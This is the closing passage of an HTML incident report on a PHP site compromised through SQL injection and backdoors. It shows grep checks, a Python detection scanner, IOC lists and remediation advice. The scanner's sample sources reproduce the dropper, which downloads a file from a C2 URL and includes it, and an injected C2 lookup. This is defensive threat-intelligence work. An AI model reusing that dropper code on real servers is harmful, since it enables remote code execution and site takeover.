grep -r "base64_decode.*eval" .
grep -r "ac=u_h_s" .</code></pre>
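<p>As an added example (not code from the original report), the following Python scanner implements the checks above with file-wide matching, so the multi-line call chains in the <code>445367/index.php</code> dropper and the injected <code>index.php</code> code from the Malicious Code Analysis section are caught, and it decodes base64 literals to expose the hidden C2 URL. The sample sources it scans are constructed to mirror the report's findings; no real file paths or network access are involved.</p>

```python
"""Static scan of PHP sources for the backdoor patterns described in this report.

Added example, not part of the original report. Unlike single-line grep it
treats each file as one text, so chains that span lines (curl_exec -> tempnam
-> file_put_contents -> include) are caught, and it decodes base64 literals
to expose hidden C2 URLs. SAMPLES below are constructed to mirror the report.
"""
import base64
import re

# Domains from the report's IOC table.
C2_DOMAINS = ("51la.zvo2.xyz", "6477-ch4-v305.rakuten38jp.click")

# Heuristic call chains: every name must appear, in this order, anywhere in the file.
CHAINS = {
    "remote fetch written to temp file and included":
        ("curl_exec", "tempnam", "file_put_contents", "include"),
    "decoded C2 reply with header injection":
        ("base64_decode", "gzuncompress", "header(", "echo"),
    "base64 payload passed to eval": ("base64_decode", "eval"),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{20,}={0,2})['\"]")


def has_chain(src, names):
    """True if each name occurs after the previous one (possibly many lines apart)."""
    pos = 0
    for name in names:
        pos = src.find(name, pos)
        if pos < 0:
            return False
        pos += len(name)
    return True


def hidden_urls(src):
    """Decode quoted base64 literals and return those that decode to a URL."""
    found = []
    for lit in B64_LITERAL.findall(src):
        try:
            text = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


def scan_source(src):
    """Return a list of finding strings for one PHP source text (empty = clean)."""
    findings = [f"C2 domain {d}" for d in C2_DOMAINS if d in src]
    findings += [label for label, names in CHAINS.items() if has_chain(src, names)]
    for url in hidden_urls(src):
        findings.append(f"base64-hidden URL {url}")
        # A decoded URL may itself name a known C2 host that never appears in clear text.
        findings += [f"C2 domain {d}" for d in C2_DOMAINS
                     if d in url and f"C2 domain {d}" not in findings]
    return findings


# Constructed samples mirroring the report: dropper, injected index.php, clean file.
SAMPLES = {
    "445367/index.php": """<?php
$url = "https://51la.zvo2.xyz/a2.txt";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
$tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
file_put_contents($tempFile, $result);
include $tempFile;
unlink($tempFile);
""",
    "index.php": """<?php
$api = base64_decode('aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s=');
$content = gzuncompress(base64_decode(h($api, $params)));
foreach ($data_array as $header) { header($header); }
echo $data;
require 'app/bootstrap.php';
""",
    "clean/helper.php": """<?php
$token = base64_encode(random_bytes(16));
echo json_encode(['token' => $token]);
""",
}


def scan_all(samples=SAMPLES):
    """Scan each named source; return {name: findings} for files with findings only."""
    results = {}
    for name, src in samples.items():
        findings = scan_source(src)
        if findings:
            results[name] = findings
    return results


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(name)
        for f in findings:
            print("   ", f)
```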
<h3>Network IOCs</h3>
<ul style="margin-left: 20px; margin-top: 10px;">
<li><strong>Attacker IP:</strong> 198.204.236.234</li>
<li><strong>C2 Domains:</strong> 51la.zvo2.xyz, 6477-ch4-v305.rakuten38jp.click</li>
<li><strong>Malicious URLs:</strong> https://51la.zvo2.xyz/a2.txt</li>
</ul>
<h3>Behavioral Indicators</h3>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Unexpected outbound connections to suspicious domains</li>
<li>New PHP files in unusual directories</li>
<li>Modified .htaccess files</li>
<li>Unexpected file modifications</li>
<li>New database users or modified permissions</li>
<li>Slow page loads (the injected code contacts the C2 server on every request before the legitimate page runs)</li>
</ul>
</section>
<section id="conclusion">
<h2>Conclusion</h2>
<p>This attack demonstrates a sophisticated multi-stage compromise using SQL injection as the initial vector, followed by deployment of multiple persistent backdoors. The attackers used remote code execution backdoors that download and execute code from C2 servers, making detection and removal challenging.</p>
<div class="alert alert-warning">
<strong>Key Takeaways:</strong>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>SQL injection vulnerabilities can lead to complete server compromise</li>
<li>Multiple backdoors ensure persistence even if some are discovered</li>
<li>Remote code execution backdoors are extremely dangerous and hard to detect</li>
<li>Regular security audits and monitoring are essential</li>
<li>Input validation and prepared statements are critical</li>
</ul>
</div>
<h3>Recommendations</h3>
<ol style="margin-left: 20px; margin-top: 10px;">
<li><strong>Immediate:</strong> Complete security audit, change all credentials, review all file modifications</li>
<li><strong>Short-term:</strong> Fix all SQL injection vulnerabilities, implement file integrity monitoring, set up intrusion detection</li>
<li><strong>Long-term:</strong> Regular security audits, penetration testing, security training for developers, automated security scanning</li>
</ol>
<div class="alert alert-info">
<strong>Sharing This Report:</strong> This report is provided to help security professionals and system administrators defend against similar attacks. Please share responsibly and ensure sensitive information (such as specific file paths, IPs, or credentials) is redacted before public distribution.
</div>
</section>
<footer class="footer">
<p><strong>Report Generated:</strong> December 12, 2025</p>
<p><strong>Purpose:</strong> Public security awareness and threat intelligence sharing</p>
<p><strong>License:</strong> This report may be freely shared for security research and awareness purposes</p>
<p style="margin-top: 20px; color: #95a5a6; font-size: 0.9em;">
For questions or additional information, please contact your security team or file a security report with appropriate authorities.
</p>
</footer>
</div>
</body>
</html>